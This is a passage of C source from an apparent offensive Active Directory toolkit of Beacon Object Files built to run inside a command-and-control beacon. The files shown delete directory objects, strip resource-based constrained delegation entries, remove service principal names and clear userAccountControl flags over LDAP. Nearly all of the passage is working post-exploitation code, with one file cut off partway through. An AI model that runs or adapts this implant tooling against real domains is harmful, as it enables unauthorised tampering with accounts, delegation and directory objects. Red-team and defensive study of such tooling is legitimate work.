    char* objectIdentifier = ValidateInput(BeaconDataExtract(&parser, NULL));
    int isObjectDN = BeaconDataInt(&parser);
    char* searchOu = ValidateInput(BeaconDataExtract(&parser, NULL));
    char* dcAddress = ValidateInput(BeaconDataExtract(&parser, NULL));
    int useLdaps = BeaconDataInt(&parser);
    
    if (!objectIdentifier || MSVCRT$strlen(objectIdentifier) == 0) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Object identifier is required");
        return;
    }
    
    // Initialize LDAP connection
    char* dcHostname = NULL;
    LDAP* ld = InitializeLDAPConnection(dcAddress, useLdaps, &dcHostname);
    if (!ld) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to initialize LDAP connection");
        return;
    }
    
    // Get default naming context (needed for searches if DN not provided)
    char* defaultNC = NULL;
    char* objectDN = NULL;
    
    if (!isObjectDN) {
        
        defaultNC = GetDefaultNamingContext(ld, dcHostname);
        if (!defaultNC) {
            BeaconPrintf(CALLBACK_ERROR, "[-] Failed to get default naming context");
            if (dcHostname) MSVCRT$free(dcHostname);
            CleanupLDAP(ld);
            return;
        }
    }
    
    // Resolve object DN
    if (isObjectDN) {
        // Object identifier is already a DN
        size_t len = MSVCRT$strlen(objectIdentifier) + 1;
        objectDN = (char*)MSVCRT$malloc(len);
        if (objectDN) {
            MSVCRT$strcpy(objectDN, objectIdentifier);
        }
    } else {
        // Search for object by sAMAccountName
        char* searchBase = (searchOu && MSVCRT$strlen(searchOu) > 0) ? searchOu : defaultNC;
        objectDN = FindObjectDN(ld, objectIdentifier, searchBase);
        
        if (!objectDN) {
            BeaconPrintf(CALLBACK_ERROR, "[-] Failed to resolve object DN");
            BeaconPrintf(CALLBACK_ERROR, "[!] Object '%s' not found", objectIdentifier);
            if (defaultNC) MSVCRT$free(defaultNC);
            CleanupLDAP(ld);
            return;
        }
    }
    
    // Delete the object
    ULONG result = WLDAP32$ldap_delete_s(ld, objectDN);
    
    if (result == LDAP_SUCCESS) {
        BeaconPrintf(CALLBACK_OUTPUT, "[+] Successfully deleted object");
        BeaconPrintf(CALLBACK_OUTPUT, "[+] DN: %s", objectDN);
    } else {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to delete object");
        PrintLdapError("Delete object", result);
        
        // Provide helpful hints
        if (result == LDAP_NO_SUCH_OBJECT) {
            BeaconPrintf(CALLBACK_ERROR, "[!] Object does not exist");
        } else if (result == LDAP_INSUFFICIENT_RIGHTS) {
            BeaconPrintf(CALLBACK_ERROR, "[!] Insufficient permissions to delete object");
        } else if (result == LDAP_INVALID_DN_SYNTAX) {
            BeaconPrintf(CALLBACK_ERROR, "[!] Invalid DN syntax");
        }
    }
    
    // Cleanup
    if (defaultNC) MSVCRT$free(defaultNC);
    if (objectDN) MSVCRT$free(objectDN);
    if (dcHostname) MSVCRT$free(dcHostname);
    CleanupLDAP(ld);
}

================================================
FILE: AD-BOF/LDAP-BOF/src/remove/remove-rbcd.c
================================================
#include <windows.h>
#include "beacon.h"
#include "ldap_common.c"
#include "acl_common.c"

// Helper function to check if an ACE matches our criteria
BOOL DoesRbcdAceMatch(PPARSED_ACE_INFO ace, const char* trusteeSid, ACCESS_MASK accessMask) {
    if (!ace || !trusteeSid) return FALSE;
    
    // Check SID match
    if (ace->TrusteeSid && MSVCRT$strcmp(ace->TrusteeSid, trusteeSid) == 0) {
        // If access mask is 0, match any mask (remove all ACEs for this trustee)
        if (accessMask == 0) {
            return TRUE;
        }
        
        // Check if access mask matches
        if (ace->Mask == accessMask) {
            return TRUE;
        }
    }
    
    return FALSE;
}

void go(char *args, int alen) {
    datap parser;
    BeaconDataParse(&parser, args, alen);
    
    // Parse arguments:
    // target_identifier, is_target_dn, principal_identifier (optional), is_principal_dn,
    // access_mask (optional - 0 means remove all for principal),
    // clear_all (if true, remove entire RBCD attribute),
    // search_ou, dc_address, use_ldaps
    char* targetIdentifier = ValidateInput(BeaconDataExtract(&parser, NULL));
    int isTargetDN = BeaconDataInt(&parser);
    char* principalIdentifier = ValidateInput(BeaconDataExtract(&parser, NULL));
    int isPrincipalDN = BeaconDataInt(&parser);
    char* accessMaskStr = ValidateInput(BeaconDataExtract(&parser, NULL));
    int clearAll = BeaconDataInt(&parser);
    char* searchOu = ValidateInput(BeaconDataExtract(&parser, NULL));
    char* dcAddress = ValidateInput(BeaconDataExtract(&parser, NULL));
    int useLdaps = BeaconDataInt(&parser);
    
    if (!targetIdentifier || MSVCRT$strlen(targetIdentifier) == 0) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Target identifier is required");
        return;
    }
    
    // Determine removal mode
    BOOL removeAllRbcd = clearAll;
    BOOL removeByPrincipal = FALSE;
    char* principalSidStr = NULL;
    PSID pPrincipalSid = NULL;
    ACCESS_MASK accessMask = 0;
    
    if (removeAllRbcd) {
        // Clear all RBCD configuration
    } else {
        if (!principalIdentifier || MSVCRT$strlen(principalIdentifier) == 0) {
            BeaconPrintf(CALLBACK_ERROR, "[-] Principal identifier required when not using --clear-all");
            return;
        }
        
        removeByPrincipal = TRUE;
        
        // Parse access mask if provided
        if (accessMaskStr && MSVCRT$strlen(accessMaskStr) > 0) {
            accessMask = ParseAccessMask(accessMaskStr);
        }
    }
    
    // Initialize LDAP connection
    char* dcHostname = NULL;
    LDAP* ld = InitializeLDAPConnection(dcAddress, useLdaps, &dcHostname);
    if (!ld) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to initialize LDAP connection");
        return;
    }
    
    // Get default naming context
    char* defaultNC = NULL;
    char* targetDN = NULL;
    char* principalDN = NULL;
    
    
    defaultNC = GetDefaultNamingContext(ld, dcHostname);
    if (!defaultNC) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to get default naming context");
        if (dcHostname) MSVCRT$free(dcHostname);
        CleanupLDAP(ld);
        return;
    }
    
    // Resolve target DN
    if (isTargetDN) {
        size_t len = MSVCRT$strlen(targetIdentifier) + 1;
        targetDN = (char*)MSVCRT$malloc(len);
        if (targetDN) {
            MSVCRT$strcpy(targetDN, targetIdentifier);
        }
    } else {
        char* searchBase = (searchOu && MSVCRT$strlen(searchOu) > 0) ? searchOu : defaultNC;
        targetDN = FindObjectDN(ld, targetIdentifier, searchBase);
        
        if (!targetDN) {
            BeaconPrintf(CALLBACK_ERROR, "[-] Failed to resolve target DN");
            BeaconPrintf(CALLBACK_ERROR, "[!] Target '%s' not found", targetIdentifier);
            MSVCRT$free(defaultNC);
            if (dcHostname) MSVCRT$free(dcHostname);
            CleanupLDAP(ld);
            return;
        }
    }
    
    // Resolve principal if removing by principal
    if (removeByPrincipal) {
        if (isPrincipalDN) {
            size_t len = MSVCRT$strlen(principalIdentifier) + 1;
            principalDN = (char*)MSVCRT$malloc(len);
            if (principalDN) {
                MSVCRT$strcpy(principalDN, principalIdentifier);
            }
        } else {
            char* searchBase = (searchOu && MSVCRT$strlen(searchOu) > 0) ? searchOu : defaultNC;
            principalDN = FindObjectDN(ld, principalIdentifier, searchBase);
            
            if (!principalDN) {
                BeaconPrintf(CALLBACK_ERROR, "[-] Failed to resolve principal DN");
                BeaconPrintf(CALLBACK_ERROR, "[!] Principal '%s' not found", principalIdentifier);
                if (targetDN) MSVCRT$free(targetDN);
                MSVCRT$free(defaultNC);
                if (dcHostname) MSVCRT$free(dcHostname);
                CleanupLDAP(ld);
                return;
            }
            BeaconPrintf(CALLBACK_OUTPUT, "[+] Resolved principal DN: %s", principalDN);
        }
        
        // Get principal's objectSid
        pPrincipalSid = GetObjectSid(ld, principalDN);
        
        if (!pPrincipalSid) {
            BeaconPrintf(CALLBACK_ERROR, "[-] Failed to retrieve principal's objectSid");
            if (principalDN) MSVCRT$free(principalDN);
            if (targetDN) MSVCRT$free(targetDN);
            MSVCRT$free(defaultNC);
            if (dcHostname) MSVCRT$free(dcHostname);
            CleanupLDAP(ld);
            return;
        }
        
        // Convert SID to string for matching
        principalSidStr = SidToString(pPrincipalSid);
        if (principalSidStr) {
            BeaconPrintf(CALLBACK_OUTPUT, "[+] Principal SID: %s", principalSidStr);
        }
    }
    
    // Read current RBCD configuration
    LDAPMessage* searchResult = NULL;
    LDAPMessage* entry = NULL;
    char* attrs[] = { "msDS-AllowedToActOnBehalfOfOtherIdentity", NULL };
    struct berval** values = NULL;
    BERVAL* currentRbcdBerval = NULL;

    ULONG result = WLDAP32$ldap_search_s(
        ld,
        targetDN,
        LDAP_SCOPE_BASE,
        "(objectClass=*)",
        attrs,
        0,
        &searchResult
    );

    if (result != LDAP_SUCCESS) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to search for object");
        PrintLdapError("Search for RBCD attribute", result);
        goto cleanup;
    }

    entry = WLDAP32$ldap_first_entry(ld, searchResult);
    if (!entry) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Object not found");
        WLDAP32$ldap_msgfree(searchResult);
        goto cleanup;
    }

    // Get current RBCD configuration
    values = WLDAP32$ldap_get_values_len(ld, entry, "msDS-AllowedToActOnBehalfOfOtherIdentity");
    
    if (!values || !values[0]) {
        BeaconPrintf(CALLBACK_OUTPUT, "[*] No RBCD configuration found on target");
        WLDAP32$ldap_msgfree(searchResult);
        goto cleanup;
    }
    
    BeaconPrintf(CALLBACK_OUTPUT, "[+] Found existing RBCD configuration (%d bytes)", values[0]->bv_len);
    
    // Allocate and copy
    currentRbcdBerval = (BERVAL*)MSVCRT$malloc(sizeof(BERVAL));
    if (currentRbcdBerval) {
        currentRbcdBerval->bv_len = values[0]->bv_len;
        currentRbcdBerval->bv_val = (char*)MSVCRT$malloc(currentRbcdBerval->bv_len);
        if (currentRbcdBerval->bv_val) {
            MSVCRT$memcpy(currentRbcdBerval->bv_val, values[0]->bv_val, currentRbcdBerval->bv_len);
        }
    }
    
    WLDAP32$ldap_value_free_len(values);
    WLDAP32$ldap_msgfree(searchResult);
    
    // If clearing all, just delete the attribute
    if (removeAllRbcd) {
        BeaconPrintf(CALLBACK_OUTPUT, "\n[*] Clearing all RBCD configuration...");
        
        LDAPModA rbcdMod;
        rbcdMod.mod_op = LDAP_MOD_DELETE;
        rbcdMod.mod_type = "msDS-AllowedToActOnBehalfOfOtherIdentity";
        rbcdMod.mod_vals.modv_strvals = NULL;
        
        LDAPModA* mods[] = { &rbcdMod, NULL };
        
        result = WLDAP32$ldap_modify_s(ld, targetDN, mods);
        
        if (result == LDAP_SUCCESS) {
            BeaconPrintf(CALLBACK_OUTPUT, "\n[+] SUCCESS: All RBCD configuration removed!");
            BeaconPrintf(CALLBACK_OUTPUT, "[*] The msDS-AllowedToActOnBehalfOfOtherIdentity attribute has been deleted");
        } else {
            BeaconPrintf(CALLBACK_ERROR, "\n[-] FAILED to remove RBCD configuration");
            PrintLdapError("Delete RBCD attribute", result);
        }
        
        if (currentRbcdBerval) {
            if (currentRbcdBerval->bv_val) MSVCRT$free(currentRbcdBerval->bv_val);
            MSVCRT$free(currentRbcdBerval);
        }
        goto cleanup;
    }
    
    // Parse the security descriptor to get current DACL
    BeaconPrintf(CALLBACK_OUTPUT, "[*] Parsing current RBCD security descriptor...");
    PSD_INFO sdInfo = ParseSecurityDescriptor((BYTE*)currentRbcdBerval->bv_val, currentRbcdBerval->bv_len);
    
    if (!sdInfo) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to parse security descriptor");
        if (currentRbcdBerval) {
            if (currentRbcdBerval->bv_val) MSVCRT$free(currentRbcdBerval->bv_val);
            MSVCRT$free(currentRbcdBerval);
        }
        goto cleanup;
    }
    
    BeaconPrintf(CALLBACK_OUTPUT, "[+] Current RBCD DACL has %d ACE(s)", sdInfo->DaclAceCount);
    
    // Find ACEs to remove
    DWORD* acesToRemove = NULL;
    DWORD removeCount = 0;
    
    BeaconPrintf(CALLBACK_OUTPUT, "[*] Searching for matching ACEs...");
    
    // First pass: count matches
    for (DWORD i = 0; i < sdInfo->DaclAceCount; i++) {
        if (DoesRbcdAceMatch(&sdInfo->DaclAces[i], principalSidStr, accessMask)) {
            removeCount++;
        }
    }
    
    if (removeCount == 0) {
        BeaconPrintf(CALLBACK_OUTPUT, "[*] No matching ACEs found, Principal may not have RBCD configured on this target");
        FreeSecurityDescriptorInfo(sdInfo);
        if (currentRbcdBerval) {
            if (currentRbcdBerval->bv_val) MSVCRT$free(currentRbcdBerval->bv_val);
            MSVCRT$free(currentRbcdBerval);
        }
        goto cleanup;
    }
    
    BeaconPrintf(CALLBACK_OUTPUT, "[+] Found %d matching ACE(s) to remove", removeCount);
    
    // Allocate array for indices
    acesToRemove = (DWORD*)MSVCRT$malloc(removeCount * sizeof(DWORD));
    if (!acesToRemove) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Memory allocation failed");
        FreeSecurityDescriptorInfo(sdInfo);
        if (currentRbcdBerval) {
            if (currentRbcdBerval->bv_val) MSVCRT$free(currentRbcdBerval->bv_val);
            MSVCRT$free(currentRbcdBerval);
        }
        goto cleanup;
    }
    
    // Second pass: collect indices
    DWORD idx = 0;
    for (DWORD i = 0; i < sdInfo->DaclAceCount; i++) {
        if (DoesRbcdAceMatch(&sdInfo->DaclAces[i], principalSidStr, accessMask)) {
            acesToRemove[idx++] = i;
            BeaconPrintf(CALLBACK_OUTPUT, "[*] Will remove ACE at index %d:", i);
            if (sdInfo->DaclAces[i].TrusteeSid) {
                BeaconPrintf(CALLBACK_OUTPUT, "    SID: %s", sdInfo->DaclAces[i].TrusteeSid);
            }
            char* maskStr = GetAccessMaskString(sdInfo->DaclAces[i].Mask);
            BeaconPrintf(CALLBACK_OUTPUT, "    Access: %s (0x%08x)", maskStr, sdInfo->DaclAces[i].Mask);
        }
    }
    
    // Get old DACL from security descriptor
    PSECURITY_DESCRIPTOR pSD = (PSECURITY_DESCRIPTOR)currentRbcdBerval->bv_val;
    PACL pOldDacl = NULL;
    BOOL daclPresent = FALSE;
    BOOL daclDefaulted = FALSE;
    
    if (!ADVAPI32$GetSecurityDescriptorDacl(pSD, &daclPresent, &pOldDacl, &daclDefaulted)) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to get DACL from security descriptor");
        MSVCRT$free(acesToRemove);
        FreeSecurityDescriptorInfo(sdInfo);
        if (currentRbcdBerval) {
            if (currentRbcdBerval->bv_val) MSVCRT$free(currentRbcdBerval->bv_val);
            MSVCRT$free(currentRbcdBerval);
        }
        goto cleanup;
    }
    
    // Check if we're removing all ACEs
    if (removeCount == sdInfo->DaclAceCount) {
        BeaconPrintf(CALLBACK_OUTPUT, "\n[*] Removing all ACEs would leave RBCD empty");
        BeaconPrintf(CALLBACK_OUTPUT, "[*] Deleting entire RBCD attribute instead");
        
        LDAPModA rbcdMod;
        rbcdMod.mod_op = LDAP_MOD_DELETE;
        rbcdMod.mod_type = "msDS-AllowedToActOnBehalfOfOtherIdentity";
        rbcdMod.mod_vals.modv_strvals = NULL;
        
        LDAPModA* mods[] = { &rbcdMod, NULL };
        
        result = WLDAP32$ldap_modify_s(ld, targetDN, mods);
        
        if (result == LDAP_SUCCESS) {
            BeaconPrintf(CALLBACK_OUTPUT, "\n[+] SUCCESS: All RBCD configuration removed!");
            BeaconPrintf(CALLBACK_OUTPUT, "[+] Removed principal: %s", principalIdentifier);
        } else {
            BeaconPrintf(CALLBACK_ERROR, "\n[-] FAILED to remove RBCD configuration");
            PrintLdapError("Delete RBCD attribute", result);
        }
        
        MSVCRT$free(acesToRemove);
        FreeSecurityDescriptorInfo(sdInfo);
        if (currentRbcdBerval) {
            if (currentRbcdBerval->bv_val) MSVCRT$free(currentRbcdBerval->bv_val);
            MSVCRT$free(currentRbcdBerval);
        }
        goto cleanup;
    }
    
    // Create new DACL without the specified ACEs
    BeaconPrintf(CALLBACK_OUTPUT, "\n[*] Creating new RBCD DACL without removed ACE(s)...");
    PACL pNewDacl = CreateNewDaclWithoutAces(pOldDacl, acesToRemove, removeCount);
    
    MSVCRT$free(acesToRemove);
    
    if (!pNewDacl) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to create new DACL");
        FreeSecurityDescriptorInfo(sdInfo);
        if (currentRbcdBerval) {
            if (currentRbcdBerval->bv_val) MSVCRT$free(currentRbcdBerval->bv_val);
            MSVCRT$free(currentRbcdBerval);
        }
        goto cleanup;
    }
    
    BeaconPrintf(CALLBACK_OUTPUT, "[+] Successfully created new RBCD DACL");
    
    // Create new security descriptor with the new DACL
    BeaconPrintf(CALLBACK_OUTPUT, "[*] Building new RBCD security descriptor...");
    
    BYTE absoluteSDBuffer[SECURITY_DESCRIPTOR_MIN_LENGTH];
    PSECURITY_DESCRIPTOR pNewSD = (PSECURITY_DESCRIPTOR)absoluteSDBuffer;
    
    if (!ADVAPI32$InitializeSecurityDescriptor(pNewSD, SECURITY_DESCRIPTOR_REVISION)) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to initialize new security descriptor");
        MSVCRT$free(pNewDacl);
        FreeSecurityDescriptorInfo(sdInfo);
        if (currentRbcdBerval) {
            if (currentRbcdBerval->bv_val) MSVCRT$free(currentRbcdBerval->bv_val);
            MSVCRT$free(currentRbcdBerval);
        }
        goto cleanup;
    }
    
    // Copy owner and group from old SD
    PSID pOwner = NULL;
    BOOL ownerDefaulted = FALSE;
    ADVAPI32$GetSecurityDescriptorOwner(pSD, &pOwner, &ownerDefaulted);
    if (pOwner) {
        ADVAPI32$SetSecurityDescriptorOwner(pNewSD, pOwner, ownerDefaulted);
    }
    
    PSID pGroup = NULL;
    BOOL groupDefaulted = FALSE;
    ADVAPI32$GetSecurityDescriptorGroup(pSD, &pGroup, &groupDefaulted);
    if (pGroup) {
        ADVAPI32$SetSecurityDescriptorGroup(pNewSD, pGroup, groupDefaulted);
    }
    
    // Set the new DACL
    if (!ADVAPI32$SetSecurityDescriptorDacl(pNewSD, TRUE, pNewDacl, FALSE)) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to set new DACL in security descriptor");
        MSVCRT$free(pNewDacl);
        FreeSecurityDescriptorInfo(sdInfo);
        if (currentRbcdBerval) {
            if (currentRbcdBerval->bv_val) MSVCRT$free(currentRbcdBerval->bv_val);
            MSVCRT$free(currentRbcdBerval);
        }
        goto cleanup;
    }
    
    BeaconPrintf(CALLBACK_OUTPUT, "[+] New RBCD security descriptor built successfully");
    
    // Convert to self-relative format
    BeaconPrintf(CALLBACK_OUTPUT, "[*] Converting to self-relative format...");
    BERVAL* newRbcdBerval = ConvertSecurityDescriptorToBerval(pNewSD);
    
    if (!newRbcdBerval) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to convert security descriptor to BERVAL");
        MSVCRT$free(pNewDacl);
        FreeSecurityDescriptorInfo(sdInfo);
        if (currentRbcdBerval) {
            if (currentRbcdBerval->bv_val) MSVCRT$free(currentRbcdBerval->bv_val);
            MSVCRT$free(currentRbcdBerval);
        }
        goto cleanup;
    }
    
    BeaconPrintf(CALLBACK_OUTPUT, "[+] Converted to self-relative format (%d bytes)", newRbcdBerval->bv_len);
    
    // Write back to LDAP
    BeaconPrintf(CALLBACK_OUTPUT, "\n[*] Writing modified RBCD configuration to LDAP...");
    
    struct berval* modValues[] = { newRbcdBerval, NULL };
    LDAPModA rbcdMod;
    rbcdMod.mod_op = LDAP_MOD_REPLACE | LDAP_MOD_BVALUES;
    rbcdMod.mod_type = "msDS-AllowedToActOnBehalfOfOtherIdentity";
    rbcdMod.mod_vals.modv_bvals = modValues;
    
    LDAPModA* mods[] = { &rbcdMod, NULL };
    
    result = WLDAP32$ldap_modify_s(ld, targetDN, mods);
    
    if (result == LDAP_SUCCESS) {
        BeaconPrintf(CALLBACK_OUTPUT, "\n[+] SUCCESS: RBCD principal(s) removed successfully!");
        BeaconPrintf(CALLBACK_OUTPUT, "[+] Removed: %d ACE(s)", removeCount);
        BeaconPrintf(CALLBACK_OUTPUT, "[+] Remaining: %d ACE(s) (was %d)", 
                    sdInfo->DaclAceCount - removeCount, sdInfo->DaclAceCount);
        
        // Verify
        BeaconPrintf(CALLBACK_OUTPUT, "\n[*] Verifying changes...");
        
        LDAPMessage* verifyResult = NULL;
        result = WLDAP32$ldap_search_s(ld, targetDN, LDAP_SCOPE_BASE, "(objectClass=*)", attrs, 0, &verifyResult);
        
        if (result == LDAP_SUCCESS) {
            LDAPMessage* verifyEntry = WLDAP32$ldap_first_entry(ld, verifyResult);
            if (verifyEntry) {
                struct berval** verifyValues = WLDAP32$ldap_get_values_len(ld, verifyEntry, "msDS-AllowedToActOnBehalfOfOtherIdentity");
                if (verifyValues && verifyValues[0]) {
                    PSD_INFO verifyInfo = ParseSecurityDescriptor((BYTE*)verifyValues[0]->bv_val, verifyValues[0]->bv_len);
                    if (verifyInfo) {
                        BeaconPrintf(CALLBACK_OUTPUT, "[+] Verification: RBCD DACL now has %d ACE(s)", verifyInfo->DaclAceCount);
                        
                        DWORD expectedCount = sdInfo->DaclAceCount - removeCount;
                        if (verifyInfo->DaclAceCount == expectedCount) {
                            BeaconPrintf(CALLBACK_OUTPUT, "[+] ACE count matches expected value");
                        } else {
                            BeaconPrintf(CALLBACK_OUTPUT, "[!] Warning: ACE count mismatch (expected %d, got %d)", 
                                        expectedCount, verifyInfo->DaclAceCount);
                        }
                        
                        FreeSecurityDescriptorInfo(verifyInfo);
                    }
                    WLDAP32$ldap_value_free_len(verifyValues);
                }
            }
            WLDAP32$ldap_msgfree(verifyResult);
        }
    } else {
        BeaconPrintf(CALLBACK_ERROR, "\n[-] FAILED to remove RBCD principal(s)");
        PrintLdapError("Modify RBCD attribute", result);
    }
    
    // Cleanup
    MSVCRT$free(pNewDacl);
    MSVCRT$free(newRbcdBerval->bv_val);
    MSVCRT$free(newRbcdBerval);
    FreeSecurityDescriptorInfo(sdInfo);
    if (currentRbcdBerval) {
        if (currentRbcdBerval->bv_val) MSVCRT$free(currentRbcdBerval->bv_val);
        MSVCRT$free(currentRbcdBerval);
    }

cleanup:
    if (principalSidStr) MSVCRT$free(principalSidStr);
    if (pPrincipalSid) MSVCRT$free(pPrincipalSid);
    if (principalDN) MSVCRT$free(principalDN);
    if (defaultNC) MSVCRT$free(defaultNC);
    if (dcHostname) MSVCRT$free(dcHostname);
    if (targetDN) MSVCRT$free(targetDN);
    CleanupLDAP(ld);
    
}

================================================
FILE: AD-BOF/LDAP-BOF/src/remove/remove-spn.c
================================================
#include <windows.h>
#include "beacon.h"
#include "ldap_common.c"

void go(char *args, int alen) {
    datap parser;
    BeaconDataParse(&parser, args, alen);

    char* targetIdentifier = ValidateInput(BeaconDataExtract(&parser, NULL));
    int isTargetDN = BeaconDataInt(&parser);
    char* spn = ValidateInput(BeaconDataExtract(&parser, NULL));
    char* searchOu = ValidateInput(BeaconDataExtract(&parser, NULL));
    char* dcAddress = ValidateInput(BeaconDataExtract(&parser, NULL));
    int useLdaps = BeaconDataInt(&parser);

    if (!targetIdentifier || MSVCRT$strlen(targetIdentifier) == 0) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Target identifier is required");
        return;
    }

    if (!spn || MSVCRT$strlen(spn) == 0) {
        return;
    }

    char* dcHostname = NULL;
    LDAP* ld = InitializeLDAPConnection(dcAddress, useLdaps, &dcHostname);
    if (!ld) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to initialize LDAP connection");
        return;
    }

    char* defaultNC = NULL;
    if (!isTargetDN) {
        defaultNC = GetDefaultNamingContext(ld, dcHostname);
        if (!defaultNC) {
            BeaconPrintf(CALLBACK_ERROR, "[-] Failed to get default naming context");
            if (dcHostname) MSVCRT$free(dcHostname);
            CleanupLDAP(ld);
            return;
        }
    }

    char* targetDN = NULL;
    if (isTargetDN) {
        size_t len = MSVCRT$strlen(targetIdentifier) + 1;
        targetDN = (char*)MSVCRT$malloc(len);
        if (targetDN) MSVCRT$strcpy(targetDN, targetIdentifier);
    } else {
        char* searchBase = (searchOu && MSVCRT$strlen(searchOu) > 0) ? searchOu : defaultNC;
        targetDN = FindObjectDN(ld, targetIdentifier, searchBase);
        if (!targetDN) {
            BeaconPrintf(CALLBACK_ERROR, "[-] Target '%s' not found", targetIdentifier);
            if (defaultNC) MSVCRT$free(defaultNC);
            if (dcHostname) MSVCRT$free(dcHostname);
            CleanupLDAP(ld);
            return;
        }
    }

    char* spn_values[] = { spn, NULL };
    LDAPModA spn_mod;
    spn_mod.mod_op = LDAP_MOD_DELETE;
    spn_mod.mod_type = "servicePrincipalName";
    spn_mod.mod_vals.modv_strvals = spn_values;

    LDAPModA* mods[] = { &spn_mod, NULL };

    ULONG result = WLDAP32$ldap_modify_s(ld, targetDN, mods);

    if (result == LDAP_SUCCESS) {
        BeaconPrintf(CALLBACK_OUTPUT, "[+] Successfully removed SPN '%s'", spn);
    } else if (result == LDAP_NO_SUCH_ATTRIBUTE) {
    } else {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to remove SPN");
        PrintLdapError("Remove SPN", result);
    }

    MSVCRT$free(targetDN);
    if (defaultNC) MSVCRT$free(defaultNC);
    if (dcHostname) MSVCRT$free(dcHostname);
    CleanupLDAP(ld);
}


================================================
FILE: AD-BOF/LDAP-BOF/src/remove/remove-uac.c
================================================
#include <windows.h>
#include "beacon.h"
#include "ldap_common.c"

DECLSPEC_IMPORT long __cdecl MSVCRT$strtol(const char* str, char** endptr, int base);

typedef struct {
    const char* name;
    DWORD value;
} UAC_FLAG_MAP;

static const UAC_FLAG_MAP uacFlags[] = {
    {"SCRIPT", UF_SCRIPT},
    {"ACCOUNTDISABLE", UF_ACCOUNTDISABLE},
    {"HOMEDIR_REQUIRED", UF_HOMEDIR_REQUIRED},
    {"LOCKOUT", UF_LOCKOUT},
    {"PASSWD_NOTREQD", UF_PASSWD_NOTREQD},
    {"PASSWD_CANT_CHANGE", UF_PASSWD_CANT_CHANGE},
    {"ENCRYPTED_TEXT_PWD_ALLOWED", UF_ENCRYPTED_TEXT_PWD_ALLOWED},
    {"TEMP_DUPLICATE_ACCOUNT", UF_TEMP_DUPLICATE_ACCOUNT},
    {"NORMAL_ACCOUNT", UF_NORMAL_ACCOUNT},
    {"INTERDOMAIN_TRUST_ACCOUNT", UF_INTERDOMAIN_TRUST_ACCOUNT},
    {"WORKSTATION_TRUST_ACCOUNT", UF_WORKSTATION_TRUST_ACCOUNT},
    {"SERVER_TRUST_ACCOUNT", UF_SERVER_TRUST_ACCOUNT},
    {"DONT_EXPIRE_PASSWD", UF_DONT_EXPIRE_PASSWD},
    {"MNS_LOGON_ACCOUNT", UF_MNS_LOGON_ACCOUNT},
    {"SMARTCARD_REQUIRED", UF_SMARTCARD_REQUIRED},
    {"TRUSTED_FOR_DELEGATION", UF_TRUSTED_FOR_DELEGATION},
    {"NOT_DELEGATED", UF_NOT_DELEGATED},
    {"USE_DES_KEY_ONLY", UF_USE_DES_KEY_ONLY},
    {"DONT_REQ_PREAUTH", UF_DONT_REQ_PREAUTH},
    {"PASSWORD_EXPIRED", UF_PASSWORD_EXPIRED},
    {"TRUSTED_TO_AUTH_FOR_DELEGATION", UF_TRUSTED_TO_AUTH_FOR_DELEGATION},
    {"NO_AUTH_DATA_REQUIRED", UF_NO_AUTH_DATA_REQUIRED},
    {"PARTIAL_SECRETS_ACCOUNT", UF_PARTIAL_SECRETS_ACCOUNT},
    {NULL, 0}
};

DWORD ParseUACFlags(const char* flagString) {
    if (!flagString || MSVCRT$strlen(flagString) == 0) return 0;
    DWORD result = 0;
    char buffer[512];
    MSVCRT$_snprintf(buffer, sizeof(buffer), "%s", flagString);

    char* token = buffer;
    char* next = buffer;

    while (*next) {
        while (*next && *next != ',') next++;
        char savedChar = *next;
        *next = '\0';

        while (*token == ' ' || *token == '\t') token++;
        char* end = token + MSVCRT$strlen(token) - 1;
        while (end > token && (*end == ' ' || *end == '\t')) {
            *end = '\0';
            end--;
        }

        if (MSVCRT$strlen(token) > 0) {
            for (int i = 0; uacFlags[i].name != NULL; i++) {
                if (MSVCRT$strcmp(token, uacFlags[i].name) == 0) {
                    result |= uacFlags[i].value;
                    break;
                }
            }
        }

        if (savedChar) {
            *next = savedChar;
            next++;
            token = next;
        } else {
            break;
        }
    }
    return result;
}

void go(char *args, int alen) {
    datap parser;
    BeaconDataParse(&parser, args, alen);

    char* targetIdentifier = ValidateInput(BeaconDataExtract(&parser, NULL));
    int isTargetDN = BeaconDataInt(&parser);
    char* flagsValue = ValidateInput(BeaconDataExtract(&parser, NULL));
    char* searchOu = ValidateInput(BeaconDataExtract(&parser, NULL));
    char* dcAddress = ValidateInput(BeaconDataExtract(&parser, NULL));
    int useLdaps = BeaconDataInt(&parser);

    if (!targetIdentifier || MSVCRT$strlen(targetIdentifier) == 0) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Target identifier is required");
        return;
    }

    if (!flagsValue || MSVCRT$strlen(flagsValue) == 0) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Flags are required (e.g., DONT_REQ_PREAUTH,ACCOUNTDISABLE)");
        return;
    }

    DWORD flagsToRemove = ParseUACFlags(flagsValue);
    if (flagsToRemove == 0) {
        BeaconPrintf(CALLBACK_ERROR, "[-] No valid flags parsed");
        return;
    }

    // Safety check: warn if trying to remove account type flags
    if (flagsToRemove & UF_ACCOUNT_TYPE_MASK) {
        BeaconPrintf(CALLBACK_ERROR, "[!] WARNING: Cannot remove account type flags!");
        BeaconPrintf(CALLBACK_ERROR, "[!] This would corrupt the account.");
        return;
    }

    char* dcHostname = NULL;
    LDAP* ld = InitializeLDAPConnection(dcAddress, useLdaps, &dcHostname);
    if (!ld) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to initialize LDAP connection");
        return;
    }

    char* defaultNC = NULL;
    if (!isTargetDN) {
        defaultNC = GetDefaultNamingContext(ld, dcHostname);
        if (!defaultNC) {
